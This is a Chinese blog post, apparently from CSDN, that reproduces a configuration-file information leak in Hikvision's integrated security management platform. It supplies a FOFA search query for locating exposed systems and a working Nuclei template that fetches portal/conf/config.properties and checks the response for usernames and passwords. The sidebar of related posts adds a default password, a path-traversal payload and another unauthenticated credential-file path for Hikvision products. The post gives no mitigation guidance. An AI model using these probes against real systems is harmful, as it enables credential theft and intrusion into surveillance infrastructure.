漏洞复现-海康威视综合安防管理平台信息泄露【附Poc】

最新推荐文章于 2024-06-19 18:34:52 发布
最新推荐文章于 2024-06-19 18:34:52 发布
阅读量3.8k 收藏 4
点赞数 2
分类专栏: Web漏洞 文章标签: 安全 网络 个人开发 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/134037624
版权

目录

【产品介绍】

【产品系统UI】

【漏洞说明】

【指纹】

【Nuclei Poc】

【验证】

【产品介绍】

海康威视(Hikvision)是一家总部位于中国杭州的公司,是全球最大的视频监控产品供应商。除了传统的CCTV摄像机和网络摄像机,海康威视还提供各种相关的安防产品和解决方案。他们的综合安防管理平台为用户提供了一站式的解决方案,包括视频监控、入侵检测、访客管理、停车场管理等。

【产品系统UI】

【漏洞说明】

海康威视综合安防平台portal/conf/config.properties接口存在敏感信息泄露

【指纹】

app=”HIKVISION-综合安防管理平台”

【Nuclei Poc】

id: hikvision-information

info:
  name: hikvision-information
  author: xxx
  severity: info
  description: 
  metadata:
    fofa-query: app="HIKVISION-综合安防管理平台"

requests:
  - method: GET
    path:
      - "{{BaseURL}}portal/conf/config.properties"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '@bic'
          - 'username'
          - 'password'                    
      - type: status
        status:
          - 200

【验证】

图片

点赞+在看支持一下吧~感谢看官老爷~ 

 +V【zkaq222】或者下面的扫码不然通不过哦,免费领取安全学习资料包!(私聊进群一起学习,共同进步)腾讯文档-在线文档icon-default.png?t=N7T8https://docs.qq.com/doc/DYmVETWlZemh0Ymdv

渗透测试老鸟-九青
关注
专栏目录
漏洞复现】Hikvision综合安防管理平台config信息泄露漏洞
晚风不及你
01-21 2418
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视iSecure Center 综合安防管理平台detection接口存在远程命令执行漏洞
最新发布
xiaokp7的博客
07-24 867
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。
(CNVD-2021-14544)海康威视流媒体管理服务器任意文件读取【复现
ximo的博客
03-30 2743
简介 海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。 漏洞说明 杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞和任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息漏洞复现 Fofa搜索标题: title="流媒体管理服务器" 找到存在弱口令的后台: admin/12345 在日志下载中进行抓包: 构造payload: ../../../../../../../windows/system32/drivers/etc/hosts 可进行下载。 ...
海康威视视频编码设备接入网关存在任意文件读取漏洞
nnn2188185的博客
04-27 802
海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。 杭州海康威视系统技术有限公司流媒体管理服务器存在任意文件读取漏洞
漏洞复现海康威视综合安防管理平台Fastjson远程命令执行漏洞复现
做自己喜欢的事,并将其发挥到极致!
04-28 8859
综合安防管理平台基于 统一软件技术架构 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞可执行系统命令,可获取到目标服务器系统权限以及敏感数据信息
海康流媒体管理服务器账号密码泄露漏洞
剁椒鱼头没剁椒的博客
02-10 1787
杭州海康威视系统技术有限公司 版权所有” && title=“流媒体管理服务器海康流媒体管理服务器配置文件未做鉴权,攻击者通过漏洞可以获取网站账号密码。这里获取到的账号密码的base64,对其进行解密即可获取账号密码。URL:IP地址:端口/config/user.xml。海康流媒体管理服务器
有了这个网络安全面试题,面试就像开了挂!(PDF)
lvaolan的博客
02-26 901
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
漏洞复现】Hikvision综合安防管理平台env信息泄漏漏洞
晚风不及你
01-21 2143
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
HiKVISION 综合安防管理平台 env信息泄漏漏洞,2024年最新网络安全源码剖析之Framwork层消息传递
2301_76225520的博客
04-13 796
Hikvision是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 875
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
【0day】复现海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞
记录并分享学习安全的知识点..
10-17 2268
​ HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,海康威视综合安防管理平台信息存在信息泄露(内网集权账户密码)漏洞,可以通过解密软件,解密用户名密码。 ​
海康威视综合安防管理平台 orgManage/v1/orgs/download 任意文件读取漏洞复现
0xSec
05-31 1274
海康威视综合安防管理平台 orgManage/v1/orgs/download 接口处存在任意文件读取漏洞,未经身份验证的远程攻击者可利用目录遍历的方式绕过权限认证直接读取后台服务器配置文件等敏感文件,造成信息泄露,使系统处于极不安全的状态。
海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
热门推荐
0xSec
05-22 1万+
海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
漏洞复现】Hikvision流媒体管理服务器信息泄露漏洞
晚风不及你
01-25 764
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视iVMS-8700综合安防管理平台 文件读取漏洞复现
0xSec
12-13 2230
HIKVISION iVMS 综合安防管理平台download接口处存在任意文件读取漏洞,攻击者通过构造token绕过身份认证,读取服务器中的目录信息与敏感文件。使系统处于极不安全的状态。
漏洞复现】Hikvision综合安防管理平台Fastjson命令执行漏洞
晚风不及你
01-23 1203
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视综合安防管理平台Fastjson远程命令执行漏洞
holyxp的博客
07-24 2077
综合安防管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
fly夏天的博客
06-19 1915
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
部署海康威视综合安防管理平台 isecure center
09-29
海康威视综合安防管理平台 iSecure Center 是一款全面且高效的安防管理系统,用于监控和管理各类安全设备,为用户提供集中化的安全管理和控制。部署 iSecure Center 可以带来以下几个方面的好处。 首先,部署 iSecure Center 可以实现全面的设备监控和管理。它能够集成并管理各类安防设备,如摄像头、门禁系统、报警器等,通过统一的平台展示监控画面、事件记录和报警信息,提供全面的安全监控和管理功能。 其次,iSecure Center 提供灵活的安防联动和智能化分析功能。用户可以自定义联动规则,例如当某个区域出现异常时,系统可以自动触发报警并进行相应的处理措施。此外,iSecure Center 还能通过智能化的分析算法,检测和识别异常行为,帮助用户迅速识别风险,提高安全防范效果。 另外,iSecure Center 提供了便捷的远程访问和管理功能。通过简单的网络连接,用户可以随时随地通过手机、电脑等设备,远程访问和管理安全设备。这使得监控和管理变得更加便捷,用户可以随时了解情况、做出决策和采取行动。 最后,iSecure Center 还具备强大的数据存储和管理能力。它可以对监控数据进行长期存储,并提供灵活的检索和查询功能,方便用户查看历史记录和进行数据分析。此外,iSecure Center 还支持多用户同时访问和管理,满足多部门协作的需求。 总的来说,部署海康威视综合安防管理平台 iSecure Center 可以提升安全管理的全面性和效率,帮助用户实时监控、联动响应、智能分析和数据管理,从而保障人员和财产的安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值